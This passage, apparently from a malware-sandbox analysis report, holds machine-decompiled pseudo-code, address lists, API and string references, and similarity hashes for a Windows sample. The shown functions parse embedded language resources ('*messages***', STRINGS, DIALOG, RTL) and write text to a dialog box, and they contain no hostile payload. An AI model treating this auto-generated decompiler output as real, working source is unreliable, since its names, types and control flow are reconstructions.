				signed int _t276;
				signed int _t277;
				void* _t278;
				signed int _t283;
				char* _t284;
				signed int _t288;
				short _t291;
				void* _t292;
				signed int _t298;
				signed int _t303;
				void* _t306;
				void* _t308;
				void* _t311;
				signed int _t320;
				intOrPtr* _t322;
				unsigned int _t332;
				signed int _t334;
				unsigned int _t337;
				signed int _t340;
				void* _t347;
				signed int _t352;
				signed int _t355;
				signed int _t356;
				signed int _t361;
				signed int _t365;
				void* _t374;
				signed int _t376;
				signed int _t377;
				void* _t378;
				void* _t379;
				intOrPtr* _t380;
				signed int _t381;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				intOrPtr* _t391;
				signed int _t393;
				void* _t394;
				void* _t396;
				void* _t398;
				void* _t402;
				void* _t403;

				_t374 = __edx;
				_t322 = __ecx;
				E00BBE0E4(E00BD1D65, _t394);
				E00BBE1C0();
				_t200 = 0x5c;
				_push(0x42f4);
				_push( *((intOrPtr*)(_t394 + 8)));
				_t391 = _t322;
				 *((intOrPtr*)(_t394 - 0x40)) = _t200;
				 *((intOrPtr*)(_t394 - 0x3c)) = _t391;
				_t201 = E00BC1438(_t322);
				_t320 = 0;
				_t400 = _t201;
				_t202 = _t394 - 0x12dc;
				if(_t201 != 0) {
					E00BAFD96(_t202,  *((intOrPtr*)(_t394 + 8)), 0x800);
				} else {
					GetModuleFileNameW(0, _t202, 0x800);
					 *((short*)(E00BABBC5(_t400, _t394 - 0x12dc))) = 0;
					E00BAFD6E(_t400, _t394 - 0x12dc,  *((intOrPtr*)(_t394 + 8)), 0x800);
				}
				E00BA95B6(_t394 - 0x2300);
				_push(4);
				 *(_t394 - 4) = _t320;
				_push(_t394 - 0x12dc);
				if(E00BA9950(_t394 - 0x2300, _t391) == 0) {
					L57:
					_t207 = E00BA95E8(_t394 - 0x2300, _t391); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t394 - 0xc));
					return _t207;
				} else {
					_t384 = _t320;
					_t402 =  *0xbdd5f4 - _t384; // 0x63
					if(_t402 <= 0) {
						L7:
						E00BC58F0(_t320, _t384, _t391,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E00BACEF0);
						E00BC58F0(_t320, _t384, _t391,  *((intOrPtr*)(_t391 + 0x14)),  *((intOrPtr*)(_t391 + 0x18)), 4, E00BACE50);
						_t398 = _t396 + 0x20;
						 *(_t394 - 0x15) = _t320;
						_t385 = _t384 | 0xffffffff;
						 *(_t394 - 0x2c) = _t320;
						 *(_t394 - 0x20) = _t385;
						while(_t385 == 0xffffffff) {
							 *(_t394 - 0x10) = E00BA9D80();
							_t298 = E00BA9B80(_t374, _t394 - 0x4300, 0x2000);
							 *(_t394 - 0x28) = _t298;
							_t388 = _t320;
							_t25 = _t298 - 0x10; // -16
							_t365 = _t25;
							 *(_t394 - 0x30) = _t365;
							if(_t365 < 0) {
								L25:
								_t299 =  *(_t394 - 0x10);
								_t385 =  *(_t394 - 0x20);
								L26:
								E00BA9C70(_t394 - 0x2300, _t394, _t299 +  *(_t394 - 0x28) + 0xfffffff0, _t320, _t320);
								_t303 =  *(_t394 - 0x2c) + 1;
								 *(_t394 - 0x2c) = _t303;
								__eflags = _t303 - 0x100;
								if(_t303 < 0x100) {
									continue;
								}
								__eflags = _t385 - 0xffffffff;
								if(_t385 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t394 + _t388 - 0x4300)) != 0x2a ||  *((char*)(_t394 + _t388 - 0x42ff)) != 0x2a) {
									L14:
									_t374 = 0x2a;
									if( *((intOrPtr*)(_t394 + _t388 - 0x4300)) != _t374) {
										L18:
										if( *((char*)(_t394 + _t388 - 0x4300)) != 0x52 ||  *((char*)(_t394 + _t388 - 0x42ff)) != 0x61) {
											L21:
											_t388 = _t388 + 1;
											if(_t388 >  *(_t394 - 0x30)) {
												goto L25;
											}
											_t298 =  *(_t394 - 0x28);
											continue;
										} else {
											_t306 = E00BC5D20(_t394 - 0x42fe + _t388, 0xbd28ec, 4);
											_t398 = _t398 + 0xc;
											if(_t306 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t370 = _t394 - 0x42fc + _t388;
									if( *((intOrPtr*)(_t394 - 0x42fc + _t388 - 2)) == _t374 && _t388 <= _t298 + 0xffffffe0) {
										_t308 = E00BC5668(_t370, L"*messages***", 0xb);
										_t398 = _t398 + 0xc;
										if(_t308 == 0) {
											 *(_t394 - 0x15) = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t311 = E00BC5D20(_t394 - 0x42fe + _t388, "*messages***", 0xb);
									_t398 = _t398 + 0xc;
									if(_t311 == 0) {
										L24:
										_t299 =  *(_t394 - 0x10);
										_t385 = _t388 +  *(_t394 - 0x10);
										 *(_t394 - 0x20) = _t385;
										goto L26;
									}
									_t298 =  *(_t394 - 0x28);
									goto L14;
								}
							}
						}
						asm("cdq");
						E00BA9C70(_t394 - 0x2300, _t394, _t385, _t374, _t320);
						_push(0x200002); // executed
						_t212 = E00BC3413(_t394 - 0x2300); // executed
						_t386 = _t212;
						 *(_t394 - 0x1c) = _t386;
						__eflags = _t386;
						if(_t386 == 0) {
							goto L57;
						}
						_t332 = E00BA9B80(_t374, _t386, 0x200000);
						 *(_t394 - 0x20) = _t332;
						__eflags =  *(_t394 - 0x15);
						if( *(_t394 - 0x15) == 0) {
							_push(2 + _t332 * 2);
							_t216 = E00BC3413(_t332);
							 *(_t394 - 0x30) = _t216;
							__eflags = _t216;
							if(_t216 == 0) {
								goto L57;
							}
							_t334 =  *(_t394 - 0x20);
							 *(_t334 + _t386) = _t320;
							__eflags = _t334 + 1;
							E00BB12D6(_t386, _t216, _t334 + 1);
							L00BC340E(_t386);
							_t386 =  *(_t394 - 0x30);
							_t337 =  *(_t394 - 0x20);
							 *(_t394 - 0x1c) = _t386;
							L33:
							_t219 = 0x100000;
							__eflags = _t337 - 0x100000;
							if(_t337 <= 0x100000) {
								_t219 = _t337;
							}
							 *((short*)(_t386 + _t219 * 2)) = 0;
							E00BAFD3B(_t394 - 0x14c, 0xbd28f4, 0x64);
							_push(0x20002); // executed
							_t222 = E00BC3413(0); // executed
							 *(_t394 - 0x10) = _t222;
							__eflags = _t222;
							if(_t222 != 0) {
								__eflags =  *(_t394 - 0x20);
								_t340 = _t320;
								_t375 = _t320;
								 *(_t394 - 0x14) = _t340;
								 *(_t394 - 0x84) = _t320;
								_t387 = _t320;
								 *(_t394 - 0x28) = _t320;
								if( *(_t394 - 0x20) <= 0) {
									L54:
									E00BACDB2(_t391, _t375, _t394 - 0x84, _t222, _t340);
									L00BC340E( *(_t394 - 0x1c)); // executed
									L00BC340E( *(_t394 - 0x10));
									__eflags =  *((intOrPtr*)(_t391 + 0x2c)) - _t320;
									if( *((intOrPtr*)(_t391 + 0x2c)) <= _t320) {
										L56:
										 *0xbdff94 =  *((intOrPtr*)(_t391 + 0x28));
										E00BC58F0(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x3c)),  *((intOrPtr*)(_t391 + 0x40)), 4, E00BACFB0);
										E00BC58F0(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x50)),  *((intOrPtr*)(_t391 + 0x54)), 4, E00BACFE0);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E00BB36F1(_t391 + 0x3c, _t375, _t320);
										E00BB36F1(_t391 + 0x50, _t375, _t320);
										_t320 = _t320 + 1;
										__eflags = _t320 -  *((intOrPtr*)(_t391 + 0x2c));
									} while (_t320 <  *((intOrPtr*)(_t391 + 0x2c)));
									goto L56;
								}
								 *((intOrPtr*)(_t394 - 0x34)) = 0xd;
								 *((intOrPtr*)(_t394 - 0x38)) = 0xa;
								 *(_t394 - 0x30) = 9;
								do {
									_t232 =  *(_t394 - 0x1c);
									__eflags = _t387;
									if(_t387 == 0) {
										L80:
										_t376 =  *(_t232 + _t387 * 2) & 0x0000ffff;
										_t387 = _t387 + 1;
										__eflags = _t376;
										if(_t376 == 0) {
											break;
										}
										__eflags = _t376 -  *((intOrPtr*)(_t394 - 0x40));
										if(_t376 !=  *((intOrPtr*)(_t394 - 0x40))) {
											_t233 = 0xd;
											__eflags = _t376 - _t233;
											if(_t376 == _t233) {
												L99:
												E00BACDB2(_t391,  *(_t394 - 0x28), _t394 - 0x84,  *(_t394 - 0x10), _t340);
												 *(_t394 - 0x84) = _t320;
												_t340 = _t320;
												 *(_t394 - 0x28) = _t320;
												L98:
												 *(_t394 - 0x14) = _t340;
												goto L52;
											}
											_t236 = 0xa;
											__eflags = _t376 - _t236;
											if(_t376 == _t236) {
												goto L99;
											}
											L96:
											__eflags = _t340 - 0x10000;
											if(_t340 >= 0x10000) {
												goto L52;
											}
											 *( *(_t394 - 0x10) + _t340 * 2) = _t376;
											_t340 = _t340 + 1;
											__eflags = _t340;
											goto L98;
										}
										__eflags = _t340 - 0x10000;
										if(_t340 >= 0x10000) {
											goto L52;
										}
										_t239 = ( *(_t232 + _t387 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0x22);
											L93:
											_pop(_t381);
											 *( *(_t394 - 0x10) + _t340 * 2) = _t381;
											_t340 = _t340 + 1;
											 *(_t394 - 0x14) = _t340;
											_t387 = _t387 + 1;
											goto L52;
										}
										_t241 = _t239 - 0x3a;
										__eflags = _t241;
										if(_t241 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t242 = _t241 - 0x12;
										__eflags = _t242;
										if(_t242 == 0) {
											_push(0xa);
											goto L93;
										}
										_t243 = _t242 - 4;
										__eflags = _t243;
										if(_t243 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t243 != 0;
										if(_t243 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t377 =  *(_t232 + _t387 * 2 - 2) & 0x0000ffff;
									__eflags = _t377 -  *((intOrPtr*)(_t394 - 0x34));
									if(_t377 ==  *((intOrPtr*)(_t394 - 0x34))) {
										L42:
										_t347 = 0x3a;
										__eflags =  *(_t232 + _t387 * 2) - _t347;
										if( *(_t232 + _t387 * 2) != _t347) {
											L71:
											 *(_t394 - 0x24) = _t232 + _t387 * 2;
											_t248 = E00BAFBFF( *(_t232 + _t387 * 2) & 0x0000ffff);
											__eflags = _t248;
											if(_t248 == 0) {
												L79:
												_t340 =  *(_t394 - 0x14);
												_t232 =  *(_t394 - 0x1c);
												goto L80;
											}
											E00BAFD96(_t394 - 0x2dc,  *(_t394 - 0x24), 0x64);
											_t252 = E00BC56E5(_t394 - 0x2dc, L" \t,");
											 *(_t394 - 0x24) = _t252;
											__eflags = _t252;
											if(_t252 == 0) {
												goto L79;
											}
											 *_t252 = 0;
											E00BB14F2(_t394 - 0x2dc, _t394 - 0x1b0, 0x64);
											E00BAFD3B(_t394 - 0xe8, _t394 - 0x14c, 0x64);
											E00BAFD14(__eflags, _t394 - 0xe8, _t394 - 0x1b0, 0x64);
											E00BAFD3B(_t394 - 0x84, _t394 - 0xe8, 0x32);
											_t266 = E00BC5739(_t320, 0, _t387, _t391, _t394 - 0xe8,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E00BACF90);
											_t398 = _t398 + 0x14;
											__eflags = _t266;
											if(_t266 != 0) {
												_t272 =  *_t266 * 0xc;
												__eflags = _t272;
												_t169 = _t272 + 0xbdd150; // 0x28b64ee0
												 *(_t394 - 0x28) =  *_t169;
											}
											_t387 = _t387 + ( *(_t394 - 0x24) - _t394 - 0x2dc >> 1) + 1;
											__eflags = _t387;
											_t271 =  *(_t394 - 0x1c);
											_t378 = 0x20;
											while(1) {
												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												L77:
												__eflags = _t352 -  *(_t394 - 0x30);
												if(_t352 !=  *(_t394 - 0x30)) {
													L51:
													_t340 =  *(_t394 - 0x14);
													goto L52;
												}
												L78:
												_t387 = _t387 + 1;
												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												goto L77;
											}
										}
										_t393 =  *(_t394 - 0x1c);
										_t274 = _t232 | 0xffffffff;
										__eflags = _t274;
										 *(_t394 - 0x2c) = _t274;
										 *(_t394 - 0x50) = L"STRINGS";
										 *(_t394 - 0x4c) = L"DIALOG";
										 *(_t394 - 0x48) = L"MENU";
										 *(_t394 - 0x44) = L"DIRECTION";
										 *(_t394 - 0x24) = _t320;
										do {
											 *(_t394 - 0x24) = E00BC33F3( *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)));
											_t276 = E00BC5668(_t393 + 2 + _t387 * 2,  *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)), _t275);
											_t398 = _t398 + 0x10;
											_t379 = 0x20;
											__eflags = _t276;
											if(_t276 != 0) {
												L47:
												_t277 =  *(_t394 - 0x2c);
												goto L48;
											}
											_t361 =  *(_t394 - 0x24) + _t387;
											__eflags =  *((intOrPtr*)(_t393 + 2 + _t361 * 2)) - _t379;
											if( *((intOrPtr*)(_t393 + 2 + _t361 * 2)) > _t379) {
												goto L47;
											}
											_t277 = _t320;
											_t107 = _t361 + 1; // 0x200001
											_t387 = _t107;
											 *(_t394 - 0x2c) = _t277;
											L48:
											_t320 = _t320 + 1;
											__eflags = _t320 - 4;
										} while (_t320 < 4);
										_t391 =  *((intOrPtr*)(_t394 - 0x3c));
										_t320 = 0;
										__eflags = _t277;
										if(__eflags != 0) {
											_t232 =  *(_t394 - 0x1c);
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												L60:
												__eflags = _t355 -  *(_t394 - 0x30);
												if(_t355 !=  *(_t394 - 0x30)) {
													_t380 = _t232 + _t387 * 2;
													 *(_t394 - 0x24) = _t320;
													_t278 = 0x20;
													_t356 = _t320;
													__eflags =  *_t380 - _t278;
													if( *_t380 <= _t278) {
														L66:
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = 0;
														E00BB14F2(_t394 - 0x214, _t394 - 0xe8, 0x64);
														_t387 = _t387 +  *(_t394 - 0x24);
														_t283 =  *(_t394 - 0x2c);
														__eflags = _t283 - 3;
														if(_t283 != 3) {
															__eflags = _t283 - 1;
															_t284 = "$%s:";
															if(_t283 != 1) {
																_t284 = "@%s:";
															}
															E00BADCAB(_t394 - 0x14c, 0x64, _t284, _t394 - 0xe8);
															_t398 = _t398 + 0x10;
														} else {
															_t288 = E00BC3429(_t394 - 0x214, _t394 - 0x214, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t391 + 0x64)) =  ~_t288 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t356 - 0x63;
														if(_t356 >= 0x63) {
															break;
														}
														_t291 =  *_t380;
														_t380 = _t380 + 2;
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = _t291;
														_t356 = _t356 + 1;
														_t292 = 0x20;
														__eflags =  *_t380 - _t292;
														if( *_t380 > _t292) {
															continue;
														}
														break;
													}
													 *(_t394 - 0x24) = _t356;
													goto L66;
												}
												L61:
												_t387 = _t387 + 1;
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												goto L60;
											}
										}
										E00BAFD3B(_t394 - 0x14c, 0xbd28f4, 0x64);
										goto L51;
									}
									_t83 = _t394 - 0x38; // 0xa
									__eflags = _t377 -  *_t83;
									if(_t377 !=  *_t83) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t387 -  *(_t394 - 0x20);
								} while (_t387 <  *(_t394 - 0x20));
								_t222 =  *(_t394 - 0x10);
								_t375 =  *(_t394 - 0x28);
								goto L54;
							} else {
								L00BC340E(_t386);
								goto L57;
							}
						}
						_t337 = _t332 >> 1;
						 *(_t394 - 0x20) = _t337;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E00BB36F1(_t391, _t374, _t384);
						E00BB36F1(_t391 + 0x14, _t374, _t384);
						_t384 = _t384 + 1;
						_t403 = _t384 -  *0xbdd5f4; // 0x63
					} while (_t403 < 0);
					_t320 = 0;
					goto L7;
				}
			}

0x00bad281
0x00bad281
0x00bad286
0x00bad290
0x00bad29a
0x00bad29b
0x00bad29c
0x00bad29f
0x00bad2a1
0x00bad2a4
0x00bad2a7
0x00bad2ad
0x00bad2af
0x00bad2b2
0x00bad2b8
0x00bad2f4
0x00bad2ba
0x00bad2c2
0x00bad2da
0x00bad2e4
0x00bad2e4
0x00bad2ff
0x00bad304
0x00bad30c
0x00bad30f
0x00bad31d
0x00bad6e0
0x00bad6e6
0x00bad6f1
0x00bad6fb
0x00bad323
0x00bad323
0x00bad325
0x00bad32b
0x00bad349
0x00bad355
0x00bad367
0x00bad36c
0x00bad36f
0x00bad372
0x00bad375
0x00bad378
0x00bad37b
0x00bad38f
0x00bad3a4
0x00bad3a9
0x00bad3ac
0x00bad3ae
0x00bad3ae
0x00bad3b1
0x00bad3b6
0x00bad475
0x00bad475
0x00bad478
0x00bad47b
0x00bad48c
0x00bad494
0x00bad495
0x00bad498
0x00bad49d
0x00000000
0x00000000
0x00bad4a3
0x00bad4a6
0x00000000
0x00000000
0x00000000
0x00bad4a6
0x00000000
0x00bad3bc
0x00bad3c4
0x00bad3ef
0x00bad3f1
0x00bad3fa
0x00bad425
0x00bad42d
0x00bad459
0x00bad459
0x00bad45d
0x00000000
0x00000000
0x00bad45f
0x00000000
0x00bad439
0x00bad449
0x00bad44e
0x00bad453
0x00000000
0x00000000
0x00000000
0x00bad453
0x00bad42d
0x00bad402
0x00bad408
0x00bad419
0x00bad41e
0x00bad423
0x00bad467
0x00000000
0x00bad467
0x00bad423
0x00000000
0x00bad3d0
0x00bad3e0
0x00bad3e5
0x00bad3ea
0x00bad46b
0x00bad46b
0x00bad46e
0x00bad470
0x00000000
0x00bad470
0x00bad3ec
0x00000000
0x00bad3ec
0x00bad3c4
0x00bad3bc
0x00bad4b5
0x00bad4b8
0x00bad4bd
0x00bad4c2
0x00bad4c7
0x00bad4c9
0x00bad4cd
0x00bad4cf
0x00000000
0x00000000
0x00bad4e6
0x00bad4eb
0x00bad4ee
0x00bad4f0
0x00bad500
0x00bad501
0x00bad506
0x00bad50a
0x00bad50c
0x00000000
0x00000000
0x00bad512
0x00bad515
0x00bad518
0x00bad51c
0x00bad522
0x00bad527
0x00bad52b
0x00bad52e
0x00bad531
0x00bad531
0x00bad536
0x00bad538
0x00bad53a
0x00bad53a
0x00bad540
0x00bad550
0x00bad555
0x00bad55a
0x00bad55f
0x00bad563
0x00bad565
0x00bad573
0x00bad577
0x00bad579
0x00bad57b
0x00bad57e
0x00bad584
0x00bad586
0x00bad589
0x00bad671
0x00bad67d
0x00bad685
0x00bad68d
0x00bad694
0x00bad697
0x00bad6b1
0x00bad6be
0x00bad6c6
0x00bad6d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00bad699
0x00bad699
0x00bad69d
0x00bad6a6
0x00bad6ab
0x00bad6ac
0x00bad6ac
0x00000000
0x00bad699
0x00bad58f
0x00bad596
0x00bad59d
0x00bad5a4
0x00bad5a4
0x00bad5a7
0x00bad5a9
0x00bad8bc
0x00bad8bc
0x00bad8c0
0x00bad8c1
0x00bad8c4
0x00000000
0x00000000
0x00bad8ca
0x00bad8ce
0x00bad920
0x00bad921
0x00bad924
0x00bad94a
0x00bad95a
0x00bad95f
0x00bad965
0x00bad967
0x00bad942
0x00bad942
0x00000000
0x00bad942
0x00bad928
0x00bad929
0x00bad92c
0x00000000
0x00000000
0x00bad92e
0x00bad92e
0x00bad934
0x00000000
0x00000000
0x00bad93d
0x00bad941
0x00bad941
0x00000000
0x00bad941
0x00bad8d0
0x00bad8d6
0x00000000
0x00000000
0x00bad8e0
0x00bad8e0
0x00bad8e3
0x00bad90a
0x00bad90c
0x00bad90f
0x00bad910
0x00bad914
0x00bad915
0x00bad918
0x00000000
0x00bad918
0x00bad8e5
0x00bad8e5
0x00bad8e8
0x00bad906
0x00000000
0x00bad906
0x00bad8ea
0x00bad8ea
0x00bad8ed
0x00bad902
0x00000000
0x00bad902
0x00bad8ef
0x00bad8ef
0x00bad8f2
0x00bad8fe
0x00000000
0x00bad8fe
0x00bad8f5
0x00bad8f8
0x00000000
0x00000000
0x00bad8fa
0x00000000
0x00bad8fa
0x00bad5af
0x00bad5b4
0x00bad5b8
0x00bad5c4
0x00bad5c6
0x00bad5c7
0x00bad5cb
0x00bad7c0
0x00bad7c3
0x00bad7ca
0x00bad7cf
0x00bad7d1
0x00bad8b6
0x00bad8b6
0x00bad8b9
0x00000000
0x00bad8b9
0x00bad7e3
0x00bad7f4
0x00bad7f9
0x00bad7fe
0x00bad800
0x00000000
0x00000000
0x00bad808
0x00bad81b
0x00bad830
0x00bad845
0x00bad85a
0x00bad872
0x00bad877
0x00bad87a
0x00bad87c
0x00bad87e
0x00bad87e
0x00bad881
0x00bad887
0x00bad887
0x00bad89a
0x00bad89a
0x00bad89c
0x00bad89f
0x00bad8a0
0x00bad8a0
0x00bad8a4
0x00bad8a7
0x00000000
0x00000000
0x00bad8a9
0x00bad8a9
0x00bad8ad
0x00bad65f
0x00bad65f
0x00000000
0x00bad65f
0x00bad8b3
0x00bad8b3
0x00bad8a0
0x00bad8a4
0x00bad8a7
0x00000000
0x00000000
0x00000000
0x00bad8a7
0x00bad8a0
0x00bad5d1
0x00bad5d4
0x00bad5d4
0x00bad5d7
0x00bad5da
0x00bad5e1
0x00bad5e8
0x00bad5ef
0x00bad5f6
0x00bad5f9
0x00bad60a
0x00bad611
0x00bad616
0x00bad61b
0x00bad61c
0x00bad61e
0x00bad636
0x00bad636
0x00000000
0x00bad636
0x00bad623
0x00bad625
0x00bad62a
0x00000000
0x00000000
0x00bad62c
0x00bad62e
0x00bad62e
0x00bad631
0x00bad639
0x00bad639
0x00bad63a
0x00bad63a
0x00bad63f
0x00bad642
0x00bad644
0x00bad646
0x00bad6fe
0x00bad701
0x00000000
0x00000000
0x00000000
0x00000000
0x00bad707
0x00bad707
0x00bad707
0x00bad70b
0x00bad70e
0x00000000
0x00000000
0x00bad710
0x00bad710
0x00bad714
0x00bad719
0x00bad71c
0x00bad721
0x00bad722
0x00bad724
0x00bad727
0x00bad748
0x00bad74a
0x00bad762
0x00bad767
0x00bad76a
0x00bad76d
0x00bad770
0x00bad793
0x00bad796
0x00bad79b
0x00bad79d
0x00bad79d
0x00bad7b3
0x00bad7b8
0x00bad772
0x00bad77e
0x00bad786
0x00bad78b
0x00bad78b
0x00000000
0x00000000
0x00000000
0x00000000
0x00bad729
0x00bad729
0x00bad729
0x00bad72c
0x00000000
0x00000000
0x00bad72e
0x00bad731
0x00bad734
0x00bad73c
0x00bad73f
0x00bad740
0x00bad743
0x00000000
0x00000000
0x00000000
0x00bad743
0x00bad745
0x00000000
0x00bad745
0x00bad716
0x00bad716
0x00bad707
0x00bad707
0x00bad70b
0x00bad70e
0x00000000
0x00000000
0x00000000
0x00bad70e
0x00bad707
0x00bad65a
0x00000000
0x00bad65a
0x00bad5ba
0x00bad5ba
0x00bad5be
0x00000000
0x00000000
0x00000000
0x00bad662
0x00bad662
0x00bad662
0x00bad66b
0x00bad66e
0x00000000
0x00bad567
0x00bad568
0x00000000
0x00bad56d
0x00bad565
0x00bad4f2
0x00bad4f4
0x00000000
0x00000000
0x00000000
0x00000000
0x00bad32d
0x00bad32d
0x00bad330
0x00bad339
0x00bad33e
0x00bad33f
0x00bad33f
0x00bad347
0x00000000
0x00bad347

APIs

__EH_prolog.LIBCMT ref: 00BAD286
_wcschr.LIBVCRUNTIME ref: 00BAD2A7
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00BAD268,?), ref: 00BAD2C2
__fprintf_l.LIBCMT ref: 00BAD7B3

Part of subcall function 00BB12D6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BAB592,00000000,?,?,?,00060384), ref: 00BB12F2

Strings

RTL, xrefs: 00BAD778
,, xrefs: 00BAD7EE
*messages***, xrefs: 00BAD3DA
*messages***, xrefs: 00BAD413
$%s:, xrefs: 00BAD796
@%s:, xrefs: 00BAD79D, 00BAD7A9
R, xrefs: 00BAD425
a, xrefs: 00BAD42F
, xrefs: 00BAD5BA

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-980926923
Opcode ID: 2366034156a7330e77eca146b6a47818de443ee402b0659cdf543619adf6d1ca
Instruction ID: bef070d8ef4648230832668fda1e15afe99bab222094373410a8baa98c0aba78
Opcode Fuzzy Hash: 2366034156a7330e77eca146b6a47818de443ee402b0659cdf543619adf6d1ca
Instruction Fuzzy Hash: 4912DF71904209AADF24DFA4DC81FEEB7F5FF0A300F5045EAE106A7691EB709A44CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00BBC9E2 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00BBC9E2() {
				intOrPtr _t41;
				intOrPtr _t44;
				struct HWND__* _t46;
				void* _t48;
				char _t49;

				E00BBABC4();
				_t46 = GetDlgItem( *0xbe7438, 0x68);
				_t49 =  *0xbe7446; // 0x1
				if(_t49 == 0) {
					_t44 =  *0xbe7458; // 0x0
					E00BB895E(_t44);
					ShowWindow(_t46, 5); // executed
					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
					SendMessageW(_t46, 0xc2, 0, 0xbd25b4);
					 *0xbe7446 = 1;
				}
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				 *(_t48 + 0x10) = 0x5c;
				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
				 *((char*)(_t48 + 0x29)) = 0;
				_t41 =  *((intOrPtr*)(_t48 + 0x70));
				 *((intOrPtr*)(_t48 + 0x14)) = 1;
				if(_t41 != 0) {
					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
				}
				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t41 != 0) {
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				}
				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
			}

0x00bbc9e9
0x00bbca03
0x00bbca08
0x00bbca0e
0x00bbca10
0x00bbca16
0x00bbca1e
0x00bbca29
0x00bbca37
0x00bbca3d
0x00bbca3d
0x00bbca4d
0x00bbca57
0x00bbca67
0x00bbca6f
0x00bbca73
0x00bbca78
0x00bbca7e
0x00bbca89
0x00bbca93
0x00bbca9b
0x00bbca9b
0x00bbcaab
0x00bbcab9
0x00bbcac8
0x00bbcad0
0x00bbcade
0x00bbcaef
0x00bbcaef
0x00bbcb0b

APIs

Part of subcall function 00BBABC4: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BBABD5
Part of subcall function 00BBABC4: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBABE6
Part of subcall function 00BBABC4: IsDialogMessageW.USER32(00060384,?), ref: 00BBABFA
Part of subcall function 00BBABC4: TranslateMessage.USER32(?), ref: 00BBAC08
Part of subcall function 00BBABC4: DispatchMessageW.USER32(?), ref: 00BBAC12

GetDlgItem.USER32(00000068,00BFDCA8), ref: 00BBC9F6
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00BBA5B2), ref: 00BBCA1E
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BBCA29
SendMessageW.USER32(00000000,000000C2,00000000,00BD25B4), ref: 00BBCA37
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BBCA4D
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BBCA67
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BBCAAB
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BBCAB9
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BBCAC8
